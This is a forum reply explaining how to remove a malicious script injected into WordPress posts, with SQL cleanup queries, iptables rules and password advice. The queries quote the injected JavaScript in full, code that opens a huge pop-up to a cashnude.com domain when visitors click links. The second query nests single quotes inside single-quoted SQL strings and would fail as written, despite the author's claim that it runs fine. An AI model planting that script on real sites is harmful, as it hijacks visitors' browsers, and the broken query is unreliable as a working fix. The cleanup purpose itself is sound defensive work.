Hello, I'm assuming all your blogs are on the apollocash server. Here is how to kill it and prevent it from coming back in 5 easy steps:
1. Delete ALL cookies in your browser, and empty your browser cache. Close your browser down. (Do NOT visit the "infected" sites!)
2. Open your browser again and log into your server PHPMYADMIN and run both cleaning queries below. (Depending on your database structure you may need to run these on all of them!)
First query to run is...
Code:
update wp_posts set post_content = replace(post_content, '<script type="text/javascript">// <![CDATA[
function consoleLog(e){try{console.log(e)}catch(t){}}(function(e,t){function n(){if(!s){s=true;for(var e=0;e<i.length;e++){i[e].fn.call(window,i[e].ctx)}i=[]}}function r(){if(document.readyState==="complete"){n()}}e=e||"docReady";t=t||window;var i=[];var s=false;var o=false;t[e]=function(e,t){if(s){setTimeout(function(){e(t)},1);return}else{i.push({fn:e,ctx:t})}if(document.readyState==="complete"){setTimeout(n,1)}else if(!o){if(document.addEventListener){document.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}else{document.attachEvent("onreadystatechange",r);window.attachEvent("onload",n)}o=true}}})("docReady",window);var aMs=document.getElementsByTagName("a");var amSwindow=false;docReady(function(){for(var e=0;e<aMs.length;e++){aMs[e].addEventListener("click",function(e){var t=Math.floor(Math.random()*2+1);consoleLog("ps:"+t);if(t==2){if(!amSwindow){amSwindow=window.open("http://fish-14j-js.cashnude.com/","NEI","width=10000,height=10000")}else{amSwindow.focus()}}},false)}})
// ]]></script>', '') where post_content like '%<script type="text/javascript">// <![CDATA[
function consoleLog(e){try{console.log(e)}catch(t){}}(function(e,t){function n(){if(!s){s=true;for(var e=0;e<i.length;e++){i[e].fn.call(window,i[e].ctx)}i=[]}}function r(){if(document.readyState==="complete"){n()}}e=e||"docReady";t=t||window;var i=[];var s=false;var o=false;t[e]=function(e,t){if(s){setTimeout(function(){e(t)},1);return}else{i.push({fn:e,ctx:t})}if(document.readyState==="complete"){setTimeout(n,1)}else if(!o){if(document.addEventListener){document.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}else{document.attachEvent("onreadystatechange",r);window.attachEvent("onload",n)}o=true}}})("docReady",window);var aMs=document.getElementsByTagName("a");var amSwindow=false;docReady(function(){for(var e=0;e<aMs.length;e++){aMs[e].addEventListener("click",function(e){var t=Math.floor(Math.random()*2+1);consoleLog("ps:"+t);if(t==2){if(!amSwindow){amSwindow=window.open("http://fish-14j-js.cashnude.com/","NEI","width=10000,height=10000")}else{amSwindow.focus()}}},false)}})
// ]]></script>%';
And the second query is...
Code:
update wp_posts set post_content = replace(post_content, '<script type='text/javascript' rel="f179568d5746648ce97a252d9b3db074">
function consoleLog(e){try{console.log(e)}catch(t){}}(function(e,t){function n(){if(!s){s=true;for(var e=0;e<i.length;e++){i[e].fn.call(window,i[e].ctx)}i=[]}}function r(){if(document.readyState==="complete"){n()}}e=e||"docReady";t=t||window;var i=[];var s=false;var o=false;t[e]=function(e,t){if(s){setTimeout(function(){e(t)},1);return}else{i.push({fn:e,ctx:t})}if(document.readyState==="complete"){setTimeout(n,1)}else if(!o){if(document.addEventListener){document.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}else{document.attachEvent("onreadystatechange",r);window.attachEvent("onload",n)}o=true}}})("docReady",window);var aMs=document.getElementsByTagName("a");var amSwindow=false;docReady(function(){for(var e=0;e<aMs.length;e++){aMs[e].addEventListener("click",function(e){var t=Math.floor(Math.random()*2+1);consoleLog("ps:"+t);if(t==2){if(!amSwindow){amSwindow=window.open("http://fish-14j-js.cashnude.com/","NEI","width=10000,height=10000")}else{amSwindow.focus()}}},false)}})
</script>', '') where post_content like '%<script type='text/javascript' rel="f179568d5746648ce97a252d9b3db074">
function consoleLog(e){try{console.log(e)}catch(t){}}(function(e,t){function n(){if(!s){s=true;for(var e=0;e<i.length;e++){i[e].fn.call(window,i[e].ctx)}i=[]}}function r(){if(document.readyState==="complete"){n()}}e=e||"docReady";t=t||window;var i=[];var s=false;var o=false;t[e]=function(e,t){if(s){setTimeout(function(){e(t)},1);return}else{i.push({fn:e,ctx:t})}if(document.readyState==="complete"){setTimeout(n,1)}else if(!o){if(document.addEventListener){document.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}else{document.attachEvent("onreadystatechange",r);window.attachEvent("onload",n)}o=true}}})("docReady",window);var aMs=document.getElementsByTagName("a");var amSwindow=false;docReady(function(){for(var e=0;e<aMs.length;e++){aMs[e].addEventListener("click",function(e){var t=Math.floor(Math.random()*2+1);consoleLog("ps:"+t);if(t==2){if(!amSwindow){amSwindow=window.open("http://fish-14j-js.cashnude.com/","NEI","width=10000,height=10000")}else{amSwindow.focus()}}},false)}})
</script>%';
You can Copy & Paste the 2 queries above into PHPMYADMIN and they should run fine.
3. Exit out of PHPMYADMIN and close your browser for now.
4. SSH into your server and run the following to your IPTABLES. (simply drop all packets from the payload site and cashnude servers. If you have not created IPTABLES before now (and you should have!) let me know in a reply and I will provide a fresh complete set for you.)
Code:
iptables -I INPUT -s 213.207.70.38 -j DROP
iptables -I INPUT -s 31.186.174.178 -j DROP
Then save your new IPTABLES lines with:
Code:
/sbin/service iptables save
Then restart Apache, for good measure, with:
Code:
service httpd restart
5. Change your SSH and FTP passwords immediately (just good practice).
As for how they done it, without access to your server I can't offer you an honest 100% exact answer. I did, however, take a quick look and it appears your server has not been hardened in any way. I would start by removing your PHPEXEC widgets (very dangerous!) and then lock the server down to prevent (well, at least make it harder to do as nothing is 100% secure) this in future.
